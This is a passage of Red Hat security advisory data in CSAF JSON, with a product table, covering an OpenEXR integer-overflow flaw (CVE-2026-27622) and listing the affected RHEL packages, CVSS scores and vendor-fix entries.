"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:7682"
},
{
"category": "workaround",
"details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
"product_ids": [
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"AppStream-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"AppStream-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.src",
"CRB-10.1.Z:openexr-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debuginfo-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-debugsource-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-devel-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-0:3.1.10-8.el10_1.1.x86_64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.aarch64",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.ppc64le",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.s390x",
"CRB-10.1.Z:openexr-libs-debuginfo-0:3.1.10-8.el10_1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing"
}
]
}
RHSA-2026:12338
Vulnerability from csaf_redhat - Published: 2026-04-30 16:02 - Updated: 2026-05-14 22:36A flaw was found in OpenEXR, an image storage format library for the motion picture industry. An attacker can craft a malicious EXR file that, when processed, causes an integer overflow in the `CompositeDeepScanLine::readPixels` function. This overflow leads to an undersized buffer allocation, which can then be overrun during write operations. Successful exploitation could result in arbitrary code execution or a denial of service (DoS).
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.E4S:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-0:2.2.0-12.el8_8.1.src | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686 | — |
Vendor Fix
fix
Workaround
|
|
| Unresolved product id: AppStream-8.8.0.Z.TUS:OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64 | — |
Vendor Fix
fix
Workaround
|
{
"document": {
"aggregate_severity": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"text": "Important"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright \u00a9 Red Hat, Inc. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "An update for OpenEXR is now available for Red Hat Enterprise Linux 8.8 Update Services for SAP Solutions and Red Hat Enterprise Linux 8.8 Telecommunications Update Service.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.",
"title": "Topic"
},
{
"category": "general",
"text": "OpenEXR is a high dynamic-range (HDR) image file format developed by Industrial Light \u0026 Magic for use in computer imaging applications. This package contains libraries and sample applications for handling the format. \n\nSecurity Fix(es):\n\n* openexr: OpenEXR: Arbitrary code execution via integer overflow in EXR file processing (CVE-2026-27622)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.",
"title": "Details"
},
{
"category": "legal_disclaimer",
"text": "This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.",
"title": "Terms of Use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://access.redhat.com/security/team/contact/",
"issuing_authority": "Red Hat Product Security is responsible for vulnerability handling across all Red Hat products and services.",
"name": "Red Hat Product Security",
"namespace": "https://www.redhat.com"
},
"references": [
{
"category": "self",
"summary": "https://access.redhat.com/errata/RHSA-2026:12338",
"url": "https://access.redhat.com/errata/RHSA-2026:12338"
},
{
"category": "external",
"summary": "https://access.redhat.com/security/updates/classification/#important",
"url": "https://access.redhat.com/security/updates/classification/#important"
},
{
"category": "external",
"summary": "2444251",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2444251"
},
{
"category": "self",
"summary": "Canonical URL",
"url": "https://security.access.redhat.com/data/csaf/v2/advisories/2026/rhsa-2026_12338.json"
}
],
"title": "Red Hat Security Advisory: OpenEXR security update",
"tracking": {
"current_release_date": "2026-05-14T22:36:27+00:00",
"generator": {
"date": "2026-05-14T22:36:27+00:00",
"engine": {
"name": "Red Hat SDEngine",
"version": "4.8.0"
}
},
"id": "RHSA-2026:12338",
"initial_release_date": "2026-04-30T16:02:14+00:00",
"revision_history": [
{
"date": "2026-04-30T16:02:14+00:00",
"number": "1",
"summary": "Initial version"
},
{
"date": "2026-04-30T16:02:14+00:00",
"number": "2",
"summary": "Last updated version"
},
{
"date": "2026-05-14T22:36:27+00:00",
"number": "3",
"summary": "Last generated version"
}
],
"status": "final",
"version": "3"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_e4s:8.8::appstream"
}
}
},
{
"category": "product_name",
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product": {
"name": "Red Hat Enterprise Linux AppStream TUS (v.8.8)",
"product_id": "AppStream-8.8.0.Z.TUS",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:rhel_tus:8.8::appstream"
}
}
}
],
"category": "product_family",
"name": "Red Hat Enterprise Linux"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product_id": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR@2.2.0-12.el8_8.1?arch=src"
}
}
}
],
"category": "architecture",
"name": "src"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=ppc64le"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=i686"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.i686",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=i686"
}
}
}
],
"category": "architecture",
"name": "i686"
},
{
"branches": [
{
"category": "product_version",
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debugsource@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-debuginfo@2.2.0-12.el8_8.1?arch=x86_64"
}
}
},
{
"category": "product_version",
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product": {
"name": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_id": "OpenEXR-libs-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/OpenEXR-libs-debuginfo@2.2.0-12.el8_8.1?arch=x86_64"
}
}
}
],
"category": "architecture",
"name": "x86_64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-0:2.2.0-12.el8_8.1.src as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-0:2.2.0-12.el8_8.1.src"
},
"product_reference": "OpenEXR-0:2.2.0-12.el8_8.1.src",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debuginfo-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64"
},
"product_reference": "OpenEXR-debugsource-0:2.2.0-12.el8_8.1.x86_64",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.i686"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.i686",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le"
},
"product_reference": "OpenEXR-libs-0:2.2.0-12.el8_8.1.ppc64le",
"relates_to_product_reference": "AppStream-8.8.0.Z.E4S"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64 as a component of Red Hat Enterprise Linux AppStream E4S (v.8.8)",
"product_id": "AppStream-8.8.0.Z.E4S:OpenEXR-libs-0:2.2.0-12.el8_8.1.x86_64"
},
